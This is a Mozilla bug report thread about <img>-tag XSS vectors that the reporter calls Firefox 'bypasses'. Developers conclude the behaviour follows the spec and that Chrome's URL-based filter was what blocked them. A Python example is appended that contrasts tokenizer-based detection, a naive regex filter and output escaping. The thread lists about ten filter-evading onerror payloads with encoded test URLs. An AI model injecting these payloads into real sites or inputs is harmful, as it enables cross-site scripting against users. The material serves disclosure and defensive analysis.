Closed Bug 759682 Opened 12 years ago Closed 3 years ago

<img> based Firefox 12 and Nightly Bypasses

Categories

(Core :: DOM: HTML Parser, defect, P5)

12 Branch
x86_64
Windows 7
defect

RESOLVED WONTFIX

People

(Reporter: justashar, Unassigned)

Details

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1155.2 Safari/537.1

Steps to reproduce:

I have found Firefox 12 and Firefox Nightly 15.0a1 bypasses. I have used the testing playground provided by "Masato Kinugawa" at http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=

These bypasses are not working in Chrome, Chrome Canary, or IE9, and NoScript for Firefox is also able to stop these <img> tag based XSS bypasses.


Actual results:

Now you will find the vectors along with the complete URL and innerHTML representation of each vector. All work fine in Firefox 12 and Firefox Nightly 15.0a1.

<img src= /" onerror=alert(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%20/%22%20onerror=alert%281%29%3E

Innerhtml Representation of Vector: <img src="/%22" onerror="alert(1)">

------------------------------------------------------------------------------

<img src=` onerror=alert(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%60%20onerror=alert%281%29%3E

Innerhtml Representation of Vector: <img src="%60" onerror="alert(1)">

------------------------------------------------------------------------------

<img src=x onerror=alert(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=x%20onerror=alert%281%29%3E

Innerhtml Representation of Vector: <img src="x" onerror="alert(1)">

------------------------------------------------------------------------------

<img src="<img src=search"/onerror=alert(1)//">

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert%281%29//%22%3E

Innerhtml Representation of Vector: <img src="%3Cimg%20src=search" onerror='alert(1)//"'>

------------------------------------------------------------------------------

<img src=? <img src=? onerror=alert(1)> onerror=alert(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=?%20%3Cimg%20src=?%20onerror=alert%281%29%3E%20onerror=alert%281%29%3E

Innerhtml Representation of Vector: <img src="?" <img="" onerror="alert(1)"> onerror=alert(1)&gt;

--------------------------------------------------------------------------------

<img/src=* onerror=alert(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg/src=*%20onerror=alert%281%29%3E

Innerhtml Representation of Vector: <img src="*" onerror="alert(1)">

---------------------------------------------------------------------------------

<img/src=onerror=alert(1) onerror=prompt(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg/src=onerror=alert%281%29%20onerror=prompt%281%29%3E

Innerhtml Representation of Vector: <img src="onerror=alert%281%29" onerror="prompt(1)">

---------------------------------------------------------------------------------


<img/src=onerror=alert(1)onerror=alert(1)" onerror=prompt(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg/src=onerror=alert%281%29onerror=alert%281%29%22%20onerror=prompt%281%29%3E

Innerhtml Representation of Vector: <img src="onerror=alert%281%29onerror=alert%281%29%22" onerror="prompt(1)">

---------------------------------------------------------------------------------

<img src="<img src=<img src= onerror=alert(1)>onerror=prompt(1)>" onerror=alert(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%22%3Cimg%20src=%3Cimg%20src=%20onerror=alert%281%29%3Eonerror=prompt%281%29%3E%22%20onerror=alert%281%29%3E


Innerhtml Representation of Vector: <img src="%3Cimg%20src=%3Cimg%20src=%20onerror=alert%281%29%3Eonerror=prompt%281%29%3E" onerror="alert(1)">

----------------------------------------------------------------------------------

<img src=% onerror=prompt(1)>

http://vulnerabledoma.in/char_test?charset=utf-8&xss=1&body=%3Cimg%20src=%%20onerror=prompt%281%29%3E


Innerhtml Representation of Vector: <img src="%" onerror="prompt(1)">


Expected results:

Is it legitimate behavior of the Firefox browser? Thanks!
Component: Untriaged → HTML: Parser
Product: Firefox → Core
QA Contact: untriaged → parser
Not entirely sure at first glance what you're claiming is being "bypassed". If you're testing a URL-based reflected XSS filter then there's nothing to bypass because Firefox doesn't have one yet. Are we parsing things differently than the other browsers?
Hi Daniel. I have tested all these vectors in other browsers and I am not getting an alert box. I have also checked the parsing behavior of Firefox at the following URL:

http://html5sec.org/innerhtml#

and you will see how Firefox treats these vectors. If you think that these vectors only deal with or are specific to a URL-based reflected XSS filter, then it's ok; it will then be normal behavior of Firefox and you can close the bug accordingly. Thanks!
<html>
<head>
    <title>
        Firefox Testing
    </title>
</head>
<body>
    <img/src=* onerror=alert(1)>
</body>
</html>

The above code snippet (as an example) results in an alert box and it is not a URL-based test. It seems to be a parsing error. Thanks!
> <img/src=onerror=alert(1) onerror=prompt(1)>

I spot-checked this one, and it gives me a prompt in Chrome dev, Safari, and Opera.  As expected.

Same thing for this one:

  <img src=? <img src=? onerror=alert(1)> onerror=alert(1)>

So what's the issue, exactly?  The behavior seems to be exactly the one required by the spec.  Can you actually give a specific example where Firefox's behavior differs from other browsers here?
> The above code snippet (as an example) results in an alert box

It does that in Chrome, Safari, and Opera as well.   The spec requires an alert box in that case.
bz: I think (not sure) that he's testing not the raw HTML but the URLs below each example, and then those other browsers have features to try to stop reflected XSS. If that's the case, though, this is invalid or at best duped to the feature request that we implement such reflected XSS filtering.
Ok, fine. As Daniel said, there is no URL-based XSS filter in Firefox, so it means that this bug has been resolved. Thanks!
> and then those other browsers have features to try to stop reflected XSS.

Ah, ok.  Yeah, in Chrome I get things like:

  Refused to execute a JavaScript script. Source code of script found within request.
Thanks. Unfortunately we don't have that feature yet :-(
Group: core-security
(In reply to Boris Zbarsky (:bz) from comment #5)
> The spec requires an
> alert box in that case.

If there is no parser bug here, can we resolve this as invalid or reassign to another component that's tracking the XSS filter work? What happened to the XSS filter work that was going on last summer?

Bulk-downgrade of unassigned, >=5 years untouched DOM/Storage bugs' priority and severity.

If you have reason to believe this is wrong, please write a comment and ni :jstutte.

Severity: normal → S4
Priority: -- → P5

XSS filtering the URL turned out not to be a great direction for browsers to take.

Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → WONTFIX
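The two points the thread settles on (the markup parses the same way in every spec-conforming tokenizer, and string-level URL filtering is not the right defence) can be shown together in a small script. This is an added example, not part of the bug report and not Mozilla code. It uses Python's html.parser, a tolerant tokenizer rather than Gecko's HTML5 parser, so it is only asserted on the simple, non-nested vectors from the report; the regex in naive_string_filter is a constructed stand-in for a request-side filter, and render_reflected is the usual server-side mitigation (escape the reflected parameter at output) rather than anything the thread's participants wrote.

```python
"""Tokenizer-based event-handler detection versus string matching.

Added example (not Mozilla code, not from the bug report). Python's
html.parser applies HTML5-style attribute rules ('/' acts as a separator
after the tag name, unquoted values may contain '"', '`', '%', '='), which is
enough to reproduce the innerHTML shown in the report for the flat vectors.
"""
import html
import re
from html.parser import HTMLParser


class HandlerFinder(HTMLParser):
    """Records every start tag and every on* attribute the tokenizer yields."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name.lower(), value))

    # A self-closing form such as <img ... /> is handled the same way.
    handle_startendtag = handle_starttag


def analyze(markup):
    """Return the tags and on* handlers the tokenizer sees in markup."""
    p = HandlerFinder()
    p.feed(markup)
    p.close()
    return {"tags": p.tags, "handlers": p.handlers}


def find_event_handlers(markup):
    return analyze(markup)["handlers"]


def naive_string_filter(markup):
    """Constructed, deliberately brittle check: it only recognises '<img'
    followed by whitespace, so '<img/src=...' slips past it even though the
    tokenizer treats the '/' as an attribute separator."""
    return re.search(r"<img\s[^>]*onerror=", markup, re.IGNORECASE) is not None


def render_reflected(body):
    """Defensive rendering of a reflected parameter: escape it for the HTML
    text context instead of trying to filter vectors out of it."""
    return "<p>" + html.escape(body, quote=True) + "</p>"


def compare(vectors):
    """(tokenizer found a handler?, naive filter flagged it?) per vector."""
    return [(bool(find_event_handlers(v)), naive_string_filter(v)) for v in vectors]


# Flat vectors copied from the bug report (sample input for this example).
VECTORS = [
    '<img src= /" onerror=alert(1)>',
    '<img src=` onerror=alert(1)>',
    '<img src=x onerror=alert(1)>',
    '<img/src=* onerror=alert(1)>',
    '<img/src=onerror=alert(1) onerror=prompt(1)>',
    '<img src=% onerror=prompt(1)>',
]


if __name__ == "__main__":
    for v, (found, flagged) in zip(VECTORS, compare(VECTORS)):
        print(f"{v!r:50} tokenizer={found} naive_filter={flagged}")
    print("escaped:", analyze(render_reflected(VECTORS[3])))
```

Every vector yields an onerror attribute on an img element once tokenized, exactly as the innerHTML lines in the report show, while the string filter misses the two vectors that put "/" where it expects whitespace. After render_reflected the same input tokenizes to a single p element with no handlers, which is the property a defender actually wants and does not depend on enumerating vectors.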